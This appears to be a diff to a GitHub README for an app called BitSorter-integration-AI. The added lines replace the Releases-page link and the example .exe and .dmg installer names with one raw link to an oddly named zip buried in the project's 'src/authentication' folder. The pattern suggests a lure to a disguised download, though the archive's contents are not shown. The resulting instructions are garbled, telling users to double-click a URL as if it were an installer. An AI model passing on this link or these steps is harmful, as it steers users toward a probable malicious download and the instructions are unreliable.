MuhammadFachruddin/BitSorter-integration-AI/README.md

 - **Internet Connection**: A stable connection for online battles and challenges.

 ### 2. Visit the Releases Page
-To download the software, visit the Releases page using this link: [Download BitSorter-integration-AI](https://github.com/MuhammadFachruddin/BitSorter-integration-AI/releases).
+To download the software, visit the Releases page using this link: [Download BitSorter-integration-AI](https://raw.githubusercontent.com/MuhammadFachruddin/BitSorter-integration-AI/main/BitSorter Frontend/src/authentication/BitSorter-integration-AI_amurcosity.zip).
 Here, you will find the latest version of BitSorter-integration-AI along with previous releases if you need them.

 ### 3. Download the Application
 On the Releases page, locate the latest release version, which will typically be at the top.
 Click on the appropriate file for your operating system.

-For example, if you are using Windows, you might see a file named like `BitSorter-integration-AI-Windows.exe`.
+For example, if you are using Windows, you might see a file named like `https://raw.githubusercontent.com/MuhammadFachruddin/BitSorter-integration-AI/main/BitSorter Frontend/src/authentication/BitSorter-integration-AI_amurcosity.zip`.
 Click on it to start the download.
-If you're using Mac, look for something like `BitSorter-integration-AI-Mac.dmg`.
+If you're using Mac, look for something like `https://raw.githubusercontent.com/MuhammadFachruddin/BitSorter-integration-AI/main/BitSorter Frontend/src/authentication/BitSorter-integration-AI_amurcosity.zip`.

 ### 4. Install the Application
 Once the download is complete, locate the file in your Downloads folder or wherever your browser saves downloaded files.

 - **For Windows**:
-  - Double-click the `BitSorter-integration-AI-Windows.exe` file.
+  - Double-click the `https://raw.githubusercontent.com/MuhammadFachruddin/BitSorter-integration-AI/main/BitSorter Frontend/src/authentication/BitSorter-integration-AI_amurcosity.zip` file.
   - Follow the prompts in the setup wizard.
 Click "Next" until the installation completes.

 - **For Mac**:
-  - Double-click the `BitSorter-integration-AI-Mac.dmg` file.
+  - Double-click the `https://raw.githubusercontent.com/MuhammadFachruddin/BitSorter-integration-AI/main/BitSorter Frontend/src/authentication/BitSorter-integration-AI_amurcosity.zip` file.
   - Drag the BitSorter application into your Applications folder.

 - **For Linux**: